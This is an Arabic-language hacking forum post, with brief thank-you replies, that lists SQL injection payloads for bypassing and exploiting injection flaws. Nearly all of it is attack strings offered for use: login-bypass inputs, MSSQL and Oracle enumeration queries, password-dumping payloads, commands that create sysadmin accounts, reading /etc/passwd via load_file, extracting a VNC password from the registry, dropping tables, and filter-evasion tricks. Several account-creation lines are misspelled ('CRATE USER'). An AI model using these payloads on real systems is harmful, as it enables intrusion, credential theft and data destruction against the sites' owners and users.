تحديث الصفحة بعض الاوامر اللي تساعد في تخطي واستغلال ثغرات الحقن

[Mouna128]

السلام عليكم ورحمه الله وبركاته
كيف الحال اعضاء منتدانا الغالي
حبيت انزل بعض الاوامر اللي تساعد في تخطي واستغلال ثغرات الحقن
نبداء :

1- حركات اساسية تستخدم لتسجيل الدخول بدون يوزر وباس :

Login:' or 1=1--
- Pass:' or 1=1--
- []' or 1=1--
########################

2- حركات اخرى معروووفة للجميع تستخدم في قواعد MsSQL:

- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
########################

3- تجميع المعلومات :

- ' or 1 in (select @@version)--
- ' union all select @@version--
########################

4- انواع قواعد البيانات واهم القواعد الاساسية الملحقة بها :

-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
########################

5- سحب كلمات السر :

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
########################

6- انشاء حسابات مستخدمين على القواعد المختلفة :

MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CRATE USER name IDENTIFIED BY '123456'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD '123456'
Oracle
CRATE USER name IDENTIFIED BY 123456
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
########################

7- استدعاء ملف من السيرفر :

- ' union select 1,load_file('/etc/passwd'),1,1,1;
########################

8- معرفة اسم السيرفر والكونفج :

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
########################

9- الحصول على اسم المستخدم والباسورد للـفي ان اس :

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
########################

10- التحايل على صناديق ادخال اسم المستخدم وكلمات السر :

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
########################

11- النقطة السابقة نفسها لكن باستخدام الفواصل والشرطات نستخدم /**/ لتخطي الفلتره على علامة + او المسافة :

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
###########

وشكرآ ...في انتظار ردودكم

[MdMn HaCk3r]

لاهنت اخي الغالي
تحيتي لك

[WOLF_DZ]

مشكورة اختي
بارك الله بيك

[zerocool]

تسلم ايدك مشكووووووووور